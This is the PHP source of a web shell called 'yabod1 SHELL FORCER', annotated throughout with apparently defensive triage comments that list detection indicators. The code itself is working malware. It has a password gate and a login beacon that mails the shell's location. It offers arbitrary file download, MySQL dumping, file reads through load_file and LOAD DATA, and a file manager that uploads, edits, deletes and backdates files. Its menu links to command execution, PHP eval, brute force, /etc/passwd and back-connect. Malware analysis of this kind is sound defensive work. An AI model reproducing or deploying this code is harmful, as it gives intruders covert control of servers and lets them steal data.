1<?php
2/****************************************\
3|* yabod1 SHELL FORCER - VERSION 2.1 *|
4|* Edit & Develop by yabod1 *|
5|* http://YaBoD1.com *|
6|* == Hacking & Security == *|
7\****************************************/
8
// Bootstrap of the web shell: sets the error level, starts output buffering and a timer,
// and defines the capability constants (SA_ROOT, IS_WIN, IS_COM, IS_GPC, IS_PHPINFO) read later in the file.
// Triage note: eregi() and the magic-quotes calls below exist only in legacy PHP releases,
// which helps date the sample and the kind of host it was written for.
// 7 = E_ERROR | E_WARNING | E_PARSE, so notices are not reported.
9error_reporting(7);
10@set_magic_quotes_runtime(0);
// Output is buffered; the download actions further down call header() before emitting data.
11ob_start();
12$mtime = explode(' ', microtime());
13$starttime = $mtime[1] + $mtime[0];
// SA_ROOT: directory containing this script, backslashes normalised to '/', with a trailing '/'.
14define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
15//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
16define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
// IS_COM gates the Windows drive enumeration in the file manager section (new COM('scripting.filesystemobject')).
17define('IS_COM', class_exists('COM') ? 1 : 0 );
18define('IS_GPC', get_magic_quotes_gpc());
// IS_PHPINFO is 1 when the string "phpinfo" does not occur in the disable_functions setting.
19$dis_func = get_cfg_var('disable_functions');
20define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
// Removes the execution time limit for this request; failures are silenced by '@'.
21@set_time_limit(0);
22
// Re-creates register_globals: every GET and POST parameter whose name does not start with '_'
// is copied into a global variable of the same name ($$_key). POST is iterated second, so it wins over GET.
// Consequence for analysis: every bare variable read later without a prior assignment
// ($action, $doing, $password, $thefile, $dir, $dbhost, ...) is attacker-supplied request data.
// These parameter names in request bodies or query strings are usable as detection indicators.
// s_array() is defined outside this excerpt; presumably it strips magic-quote slashes — confirm.
23foreach(array('_GET','_POST') as $_request) {
24 foreach($$_request as $_key => $_value) {
25 if ($_key{0} != '_') {
26 if (IS_GPC) {
27 $_value = s_array($_value);
28 }
29 $$_key = $_value;
30 }
31 }
32}
33
34/*================= Info Login ================*/
// Access-control settings for the shell. $admin is re-initialised here, after the request-variable
// import loop earlier in the file, so a request parameter named "admin" does not survive this point.
35$admin = array();
// When true, the login section below enforces the password/cookie check.
36$admin['check'] = true;
// The credential is a hard-coded plaintext string; it is compared directly against request and cookie
// values in the login section, so the literal is a stable indicator for this sample.
37$admin['pass'] = 'zilli'; // Password login
// Cookie attributes; presumably consumed by scookie(), which is defined outside this excerpt — confirm.
38$admin['cookiepre'] = '';
39$admin['cookiedomain'] = '';
40$admin['cookiepath'] = '/';
// 86400 seconds = one day.
41$admin['cookielife'] = 86400;
42/*===================== End =====================*/
43
// Selects the response charset from the request-supplied $charset (no assignment precedes this use).
// Only four fixed values send a header; any other value sends none.
// Note that 'latin1' is mapped to iso-8859-2 here.
44if ($charset == 'utf8') {
45 header("content-Type: text/html; charset=utf-8");
46} elseif ($charset == 'big5') {
47 header("content-Type: text/html; charset=big5");
48} elseif ($charset == 'gbk') {
49 header("content-Type: text/html; charset=gbk");
50} elseif ($charset == 'latin1') {
51 header("content-Type: text/html; charset=iso-8859-2");
52}
53
// $self is the script's own URL path; it is written unescaped into form actions and meta-refresh tags below.
54$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
// $timestamp is reused in the field/line terminators of the LOAD DATA statement in the 'mysqldown' action.
55$timestamp = time();
56
57/*===================== Login =====================*/
// Authentication gate of the shell. There is no server-side session: the auth token is the plaintext
// password itself, stored in a cookie named 'tmtpass'. Indicators visible in this block: the cookie name,
// the outbound mail sent on login, and the third-party image URL in the welcome page.
// scookie(), p() and loginpage() are defined outside this excerpt.

// Logout: expires the cookie by setting a lifetime in the past, then redirects to the script itself.
58if ($action == "logout") {
59 scookie('tmtpass', '', -86400 * 365);
60 p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
61 p('<body background=>');
62 exit;
63}
64if($admin['check']) {
65 if ($doing == 'login') {
// Loose (==) comparison of the hard-coded password with the request-supplied $password;
// on success the submitted password is written back as the cookie value.
66 if ($admin['pass'] == $password) {
67 scookie('tmtpass', $password);
68
// Login beacon: on every successful login the script mails the shell URL (SERVER_NAME + REQUEST_URI),
// the resolved server IP, the client IP and a timestamp to $to_email, with From set to shell@<server IP>.
// Whoever controls that address learns where the shell is deployed, independently of who uploaded it.
// In this copy $to_email is '133', which is not a deliverable address — presumably redacted or neutered; confirm.
// Detection: mail() calls / outbound SMTP from the web-server account with a "shell@" sender.
69// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks -
70$time_shell = "".date("d/m/Y - H:i:s")."";
71$ip_remote = $_SERVER["REMOTE_ADDR"];
72$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
73$to_email = '133';
74$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
75$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
76$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
77@mail($to_email, $server_mail, $linkcr, $header);
// The welcome page loads an image from an external host, so the operator's browser contacts that host
// on each login (and may disclose the shell URL in the Referer header).
78 p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
79 p('<body background=>
80<BR><BR><div align=center><font color=yellow face=tahoma size=2>Welcome back! yabod1.COM\'s Member - Please wait...<BR><img src=http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif></div>');
81 exit;
82 }
83
84 else
85 {
86 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
87echo $err_mess;
88 }}
// Cookie check applied to every request: a missing or non-matching 'tmtpass' cookie leads to loginpage().
// NOTE(review): loginpage() presumably renders the form and terminates the request; if it returned,
// execution would continue into the actions below — confirm against its definition.
89 if ($_COOKIE['tmtpass']) {
90 if ($_COOKIE['tmtpass'] != $admin['pass']) {
91 loginpage();
92 }
93 } else {
94 loginpage();
95 }
96}
97/*===================== Login =====================*/
98
// Resets the error message shown later by m($errmsg), then handles the 'phpinfo' action:
// dumps the full phpinfo() page when the function is not listed in disable_functions (IS_PHPINFO),
// otherwise records an error string. phpinfo() output exposes configuration, paths and environment variables.
99$errmsg = '';
100
101if ($action == 'phpinfo') {
102 if (IS_PHPINFO) {
103 phpinfo();
104 } else {
105 $errmsg = 'phpinfo() function has non-permissible';
106 }
107}
108
109
// 'downfile' action: arbitrary file read. $thefile is request-supplied and is used as-is, so any path
// readable by the PHP process is streamed back as an attachment. No base-directory restriction is applied.
// The extension and basename taken from the path are placed into response headers unescaped.
// Detection: responses with Content-type "application/x-<extension>" and requests carrying doing=downfile.
110if ($doing == 'downfile' && $thefile) {
111 if (!@file_exists($thefile)) {
112 $errmsg = 'The file you want Downloadable was nonexistent';
113 } else {
114 $fileinfo = pathinfo($thefile);
115 header('Content-type: application/x-'.$fileinfo['extension']);
116 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
117 header('Content-Length: '.filesize($thefile));
118 @readfile($thefile);
119 exit;
120 }
121}
122
123
// 'backupmysql' action without $saveasfile: dumps selected tables as a downloadable file named
// <HTTP_HOST>_MySQL.sql. Connection parameters ($dbhost, $dbuser, $dbpass, $dbname, $dbport) and the
// table selection ($table) all come from the request. dbconn(), q() and sqldumptable() are defined
// outside this excerpt; the mysql_* calls belong to the legacy MySQL extension.
124if ($doing == 'backupmysql' && !$saveasfile) {
125 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// array_flip turns the submitted list into a name => index map so isset() can test membership.
126 $table = array_flip($table);
127 $result = q("SHOW tables");
128 if (!$result) p('<h2>'.mysql_error().'</h2>');
129 $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
130 header('Content-type: application/unknown');
131 header('Content-Disposition: attachment; filename='.$filename);
// NOTE(review): $mysqldata is accumulated but never echoed in this block; the dump only reaches the
// client if sqldumptable() prints it itself — confirm against its definition.
132 $mysqldata = '';
133 while ($currow = mysql_fetch_array($result)) {
134 if (isset($table[$currow[0]])) {
135 $mysqldata .= sqldumptable($currow[0]);
136 }
137 }
138 mysql_close();
139 exit;
140}
141
142// Mysql
// 'mysqldown' action: reads a file through the database server instead of through PHP's file functions,
// using request-supplied connection parameters and a request-supplied path ($mysqldlfile).
// Indicators for database/query logs: load_file() on arbitrary paths, a short-lived table named
// tmp_angel, and LOAD DATA terminators of the form __angel_<unix time>_eof__.
// q() is defined outside this excerpt; presumably a thin wrapper over mysql_query — confirm.
143if($doing=='mysqldown'){
144 if (!$dbname) {
145 $errmsg = 'Please input dbname';
146 } else {
147 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// The existence check runs on the web host's filesystem, so this path proceeds only for files PHP can see.
148 if (!file_exists($mysqldlfile)) {
149 $errmsg = 'The file you want Downloadable was nonexistent';
150 } else {
// $mysqldlfile is interpolated into the SQL string without escaping here (the fallback below uses addslashes).
151 $result = q("select load_file('$mysqldlfile');");
// Fallback when the load_file() query fails: import the file client-side into a temporary table,
// read it back, and drop the table.
152 if(!$result){
153 q("DROP TABLE IF EXISTS tmp_angel;");
154 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
155 //Download SQL
156 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
157 $result = q("select content from tmp_angel");
158 q("DROP TABLE tmp_angel");
159 }
160 $row = @mysql_fetch_array($result);
161 if (!$row) {
162 $errmsg = 'Load file failed '.mysql_error();
163 } else {
164 $fileinfo = pathinfo($mysqldlfile);
165 header('Content-type: application/x-'.$fileinfo['extension']);
166 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
// "Accept-Length" is not a standard response header; it is a distinctive string in this sample's responses.
167 header("Accept-Length: ".strlen($row[0]));
168 echo $row[0];
169 exit;
170 }
171 }
172 }
173}
174
175?>
176<html>
177<head>
178<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
179<title><?php echo str_replace('.','','yabod1. SHELL. - . E.d.i.t.e.d. b.y. yabod1 - b4@live[dot]fr');?></title>
180<style type="text/css">
181body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
182
183a {color: #74A202;text-decoration:none;}
184a:hover{color: #f00;text-decoration:underline;}
185.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
186.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
187.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
188.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
189.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
190.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
191.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
192.head td span{font-weight:normal;}
193form{margin:0;padding:0;}
194h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
195ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
196u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
197input, textarea, button
198{
199 font-size: 9pt;
200 color: #ccc;
201 font-family: verdana, sans-serif;
202 background-color: #202020;
203 border-left: 1px solid #74A202;
204 border-top: 1px solid #74A202;
205 border-right: 1px solid #74A202;
206 border-bottom: 1px solid #74A202;
207}
208select
209{
210 font-size: 8pt;
211 font-weight: normal;
212 color: #ccc;
213 font-family: verdana, sans-serif;
214 background-color: #202020;
215}
216
217</style>
218<script type="text/javascript">
// Copies the checked state of the form's "chkall" checkbox onto every other element of that form.
// Used by the "select all" box in the file list.
219function CheckAll(form) {
220 for(var i=0;i<form.elements.length;i++) {
221 var e = form.elements[i];
222 if (e.name != 'chkall')
223 e.checked = form.chkall.checked;
224 }
225}
// Shorthand for document.getElementById; every other script helper on the page looks forms up through it.
226function $(id) {
227 return document.getElementById(id);
228}
// Navigation helper behind every menu link: writes the requested module name into the hidden "action"
// field of the form with id "goaction" and submits it.
// NOTE(review): the form is emitted by formhead(), defined outside this excerpt; if it posts, the module
// names travel in the request body rather than the URL, so they would not show in access-log query strings — confirm.
229function goaction(act){
230 $('goaction').action.value=act;
231 $('goaction').submit();
232}
233</script>
234</head>
235<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
236
237
238<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
239 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
240 <tr>
241 <td align="center" valign=center>
242 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
243 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
244 </div>
245 </td>
246 </tr>
247 </table>
248 </div>
249 <script>
// Legacy browser sniffing for the "Loading" overlay: resolves `ld` to the overlay element (document.layers
// browsers) or to its style object (getElementById / document.all browsers) so init() can hide it.
250 var ld=(document.all);
251 var ns4=document.layers;
252 var ns6=document.getElementById&&!document.all;
253 var ie4=document.all;
254 if (ns4)
255 ld=document.loading;
256 else if (ns6)
257 ld=document.getElementById("loading").style;
258 else if (ie4)
259 ld=document.all.loading.style;
// Runs from <body onLoad>: hides the "Loading" overlay once the page has loaded, using whichever
// property the detected browser family supports.
260 function init()
261 {
262 if(ns4){ld.visibility="hidden";}
263 else if (ns6||ie4) ld.display="none";
264 }
265 </script>
266
267
268
269
270<table width="100%" border="0" cellpadding="0" cellspacing="0">
271 <tr class="head_small">
272 <td width=100%>
273 <table width=100%><tr class="head_small"><td width=86px><a title="yabod1 Shell" href="<?php $self;?>"><img src=http://img02.arabsh.com/uploads/image/2012/05/18/0e35434d60f305.png height=86 border=0></a></td><td>
274 <span style="float:right;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://YaBoD1.com" target="_blank"><?php echo str_replace('.','','V.B.A. T.e.a.m');?> Version 2.2</a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span>
275
276 <?php
// Environment fingerprint banner shown at the top of every page: PHP version, availability of cURL and
// database client functions, the disable_functions list, uname string, and the uid/gid and account
// the PHP process runs as.
// For hardening: the disable_functions value and the process account printed here are what this sample
// reports to its operator on each page load.
// NOTE(review): $safe_mode and $SERVER_SOFTWARE are not assigned anywhere in the visible code; they are
// populated only through the request-variable import at the top of the file (or register_globals), so the
// "Safe_mod" and "Server" fields reflect request input or are empty.
277 $curl_on = @function_exists('curl_version');
278 $mysql_on = @function_exists('mysql_connect');
279 $mssql_on = @function_exists('mssql_connect');
280 $pg_on = @function_exists('pg_connect');
281 $ora_on = @function_exists('ocilogon');
282
283echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
284echo "PHP version: <b>".@phpversion()."</b> - ";
285 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
286 echo "MySQL: <b>";
// The *_on flags below are recomputed with the same function_exists() calls as above.
287$mysql_on = @function_exists('mysql_connect');
288if($mysql_on){
289echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
290echo "MSSQL: <b>";
291$mssql_on = @function_exists('mssql_connect');
292if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
293echo "PostgreSQL: <b>";
294$pg_on = @function_exists('pg_connect');
295if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
296echo "Oracle: <b>";
297$ora_on = @function_exists('ocilogon');
298if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
299
// Prints the raw disable_functions setting, or NONE when it is empty.
300echo "Disable functions : <b>";
301if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
302
// uname and server strings are truncated to 120 characters.
303echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
304echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
305 ?>
306 </td></tr></table></td>
307 </tr>
308 <tr class="alt1">
309 <td width=100%><span style="float:right;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span>
310
311 <a href="javascript:goaction('file');">File Manager</a> |
312 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
313 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
314 <a href="javascript:goaction('shell');">Execute Command</a> |
315 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
316 <a href="javascript:goaction('eval');">Eval PHP Code</a>
317 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
318 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
319 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
320 </td>
321 </tr>
322</table>
323<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
324<?php
325
// Emits the hidden "goaction" navigation form, shows any pending error message, and resolves the
// working directory for the file manager. formhead(), makehide(), formfoot(), m(), getPath() and ue()
// are defined outside this excerpt.
326formhead(array('name'=>'goaction'));
327makehide('action');
328formfoot();
329
330$errmsg && m($errmsg);
331
// $dir is request-supplied and defaults to '.'; no restriction to the web root is applied in the visible
// code, so the file manager browses whatever path the request names.
332// Dir function
333!$dir && $dir = '.';
334$nowpath = getPath(SA_ROOT, $dir);
// Ensures $dir ends with '/'.
335if (substr($dir, -1) != '/') {
336 $dir = $dir.'/';
337}
// presumably a URL-encoded copy of $dir — confirm against ue().
338$uedir = ue($dir);
339
340if (!$action || $action == 'file') {
341
342 // Non-writeable
343 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
344
345 // Delete dir
346 if ($doing == 'deldir' && $thefile) {
347 if (!file_exists($thefile)) {
348 m($thefile.' directory does not exist');
349 } else {
350 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
351 }
352 }
353
354 // Create new dir
355 elseif ($newdirname) {
356 $mkdirs = $nowpath.$newdirname;
357 if (file_exists($mkdirs)) {
358 m('Directory has already existed');
359 } else {
360 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
361 @chmod($mkdirs,0777);
362 }
363 }
364
365 // Upload file
366 elseif ($doupfile) {
367 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
368 }
369
370 // Edit file
371 elseif ($editfilename && $filecontent) {
372 $fp = @fopen($editfilename,'w');
373 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
374 @fclose($fp);
375 }
376
377 // Modify
378 elseif ($pfile && $newperm) {
379 if (!file_exists($pfile)) {
380 m('The original file does not exist');
381 } else {
382 $newperm = base_convert($newperm,8,10);
383 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
384 }
385 }
386
387 // Rename
388 elseif ($oldname && $newfilename) {
389 $nname = $nowpath.$newfilename;
390 if (file_exists($nname) || !file_exists($oldname)) {
391 m($nname.' has already existed or original file does not exist');
392 } else {
393 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
394 }
395 }
396
397 // Copu
398 elseif ($sname && $tofile) {
399 if (file_exists($tofile) || !file_exists($sname)) {
400 m('The goal file has already existed or original file does not exist');
401 } else {
402 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
403 }
404 }
405
406 // File exit
407 elseif ($curfile && $tarfile) {
408 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
409 m('The goal file has already existed or original file does not exist');
410 } else {
411 $time = @filemtime($tarfile);
412 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
413 }
414 }
415
416 // Date
417 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
418 if (!@file_exists($curfile)) {
419 m(basename($curfile).' does not exist');
420 } else {
421 $time = strtotime("$year-$month-$day $hour:$minute:$second");
422 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
423 }
424 }
425
426 // Download
427 elseif($doing == 'downrar') {
428 if ($dl) {
429 $dfiles='';
430 foreach ($dl as $filepath => $value) {
431 $dfiles.=$filepath.',';
432 }
433 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
434 $dl=explode(',',$dfiles);
435 $zip=new PHPZip($dl);
436 $code=$zip->out;
437 header('Content-type: application/octet-stream');
438 header('Accept-Ranges: bytes');
439 header('Accept-Length: '.strlen($code));
440 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
441 echo $code;
442 exit;
443 } else {
444 m('Please select file(s)');
445 }
446 }
447
448 // Delete file
449 elseif($doing == 'delfiles') {
450 if ($dl) {
451 $dfiles='';
452 $succ = $fail = 0;
453 foreach ($dl as $filepath => $value) {
454 if (@unlink($filepath)) {
455 $succ++;
456 } else {
457 $fail++;
458 }
459 }
460 m('Deleted file have finished��choose '.count($dl).' success '.$succ.' fail '.$fail);
461 } else {
462 m('Please select file(s)');
463 }
464 }
465
466 // Function Newdir
467 formhead(array('name'=>'createdir'));
468 makehide('newdirname');
469 makehide('dir',$nowpath);
470 formfoot();
471 formhead(array('name'=>'fileperm'));
472 makehide('newperm');
473 makehide('pfile');
474 makehide('dir',$nowpath);
475 formfoot();
476 formhead(array('name'=>'copyfile'));
477 makehide('sname');
478 makehide('tofile');
479 makehide('dir',$nowpath);
480 formfoot();
481 formhead(array('name'=>'rename'));
482 makehide('oldname');
483 makehide('newfilename');
484 makehide('dir',$nowpath);
485 formfoot();
486 formhead(array('name'=>'fileopform'));
487 makehide('action');
488 makehide('opfile');
489 makehide('dir');
490 formfoot();
491
492 $free = @disk_free_space($nowpath);
493 !$free && $free = 0;
494 $all = @disk_total_space($nowpath);
495 !$all && $all = 0;
496 $used = $all-$free;
497 $used_percent = @round(100/($all/$free),2);
498 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
499
500?>
501<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
502 <form action="" method="post" id="godir" name="godir">
503 <tr>
504 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
505 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
506 <td nowrap><input class="bt" value="GO" type="submit"></td>
507 </tr>
508 </form>
509</table>
510<script type="text/javascript">
// Prompts for a directory name and submits it through the hidden "createdir" form (field newdirname);
// the server side joins it onto the current path and calls mkdir with mode 0777.
511function createdir(){
512 var newdirname;
513 newdirname = prompt('Please input the directory name:', '');
514 if (!newdirname) return;
515 $('createdir').newdirname.value=newdirname;
516 $('createdir').submit();
517}
// Prompts for a new permission value for the given path and submits both through the hidden "fileperm"
// form (fields newperm, pfile); the server side converts the value from octal and calls chmod.
518function fileperm(pfile){
519 var newperm;
520 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
521 if (!newperm) return;
522 $('fileperm').newperm.value=newperm;
523 $('fileperm').pfile.value=pfile;
524 $('fileperm').submit();
525}
// Prompts for a destination path and submits source and destination through the hidden "copyfile"
// form (fields sname, tofile).
526function copyfile(sname){
527 var tofile;
528 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
529 if (!tofile) return;
530 $('copyfile').tofile.value=tofile;
531 $('copyfile').sname.value=sname;
532 $('copyfile').submit();
533}
// Prompts for a new file name and submits old and new names through the hidden "rename" form
// (fields oldname, newfilename).
534function rename(oldname){
535 var newfilename;
536 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
537 if (!newfilename) return;
538 $('rename').newfilename.value=newfilename;
539 $('rename').oldname.value=oldname;
540 $('rename').submit();
541}
// Dispatcher for per-file and bulk operations: optionally asks for confirmation with message m, then
// sets the "doing" (and, when given, "thefile") fields of the "filelist" form and submits it.
// The "filelist" form is emitted with method="post", so these values travel in the request body.
542function dofile(doing,thefile,m){
543 if (m && !confirm(m)) {
544 return;
545 }
546 $('filelist').doing.value=doing;
547 if (thefile){
548 $('filelist').thefile.value=thefile;
549 }
550 $('filelist').submit();
551}
// Prompts for a file name and opens the editor on nowpath + filename by delegating to opfile('editfile', ...).
552function createfile(nowpath){
553 var filename;
554 filename = prompt('Please input the file name:', '');
555 if (!filename) return;
556 opfile('editfile',nowpath + filename,nowpath);
557}
// Fills the hidden "fileopform" form with the module name (action), the target path (opfile) and the
// current directory (dir), then submits it. Used for the edit and timestamp-change links.
558function opfile(action,opfile,dir){
559 $('fileopform').action.value=action;
560 $('fileopform').opfile.value=opfile;
561 $('fileopform').dir.value=dir;
562 $('fileopform').submit();
563}
// Directory navigation: sets the "dir" field of the "godir" form (method="post") and submits it.
// When view_writable is truthy the hidden view_writable field is set to 1, which makes the server side
// list entries via GetList() instead of a plain directory read.
564function godir(dir,view_writable){
565 if (view_writable) {
566 $('godir').view_writable.value=1;
567 }
568 $('godir').dir.value=dir;
569 $('godir').submit();
570}
571</script>
572 <?php
573 tbhead();
574 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
575 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
576 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
577 if ($view_writable) {
578 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
579 } else {
580 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
581 }
582 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
583 if (IS_WIN && IS_COM) {
584 $obj = new COM('scripting.filesystemobject');
585 if ($obj && is_object($obj)) {
586 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
587 foreach($obj->Drives as $drive) {
588 if ($drive->DriveType == 2) {
589 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
590 } else {
591 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
592 }
593 }
594 }
595 }
596
597 p('</td></tr></form>');
598
599 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
600
601 // Get path
602 $dirdata=array();
603 $filedata=array();
604
605 if ($view_writable) {
606 $dirdata = GetList($nowpath);
607 } else {
608 // Open dir
609 $dirs=@opendir($dir);
610 while ($file=@readdir($dirs)) {
611 $filepath=$nowpath.$file;
612 if(@is_dir($filepath)){
613 $dirdb['filename']=$file;
614 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
615 $dirdb['dirchmod']=getChmod($filepath);
616 $dirdb['dirperm']=getPerms($filepath);
617 $dirdb['fileowner']=getUser($filepath);
618 $dirdb['dirlink']=$nowpath;
619 $dirdb['server_link']=$filepath;
620 $dirdb['client_link']=ue($filepath);
621 $dirdata[]=$dirdb;
622 } else {
623 $filedb['filename']=$file;
624 $filedb['size']=sizecount(@filesize($filepath));
625 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
626 $filedb['filechmod']=getChmod($filepath);
627 $filedb['fileperm']=getPerms($filepath);
628 $filedb['fileowner']=getUser($filepath);
629 $filedb['dirlink']=$nowpath;
630 $filedb['server_link']=$filepath;
631 $filedb['client_link']=ue($filepath);
632 $filedata[]=$filedb;
633 }
634 }// while
635 unset($dirdb);
636 unset($filedb);
637 @closedir($dirs);
638 }
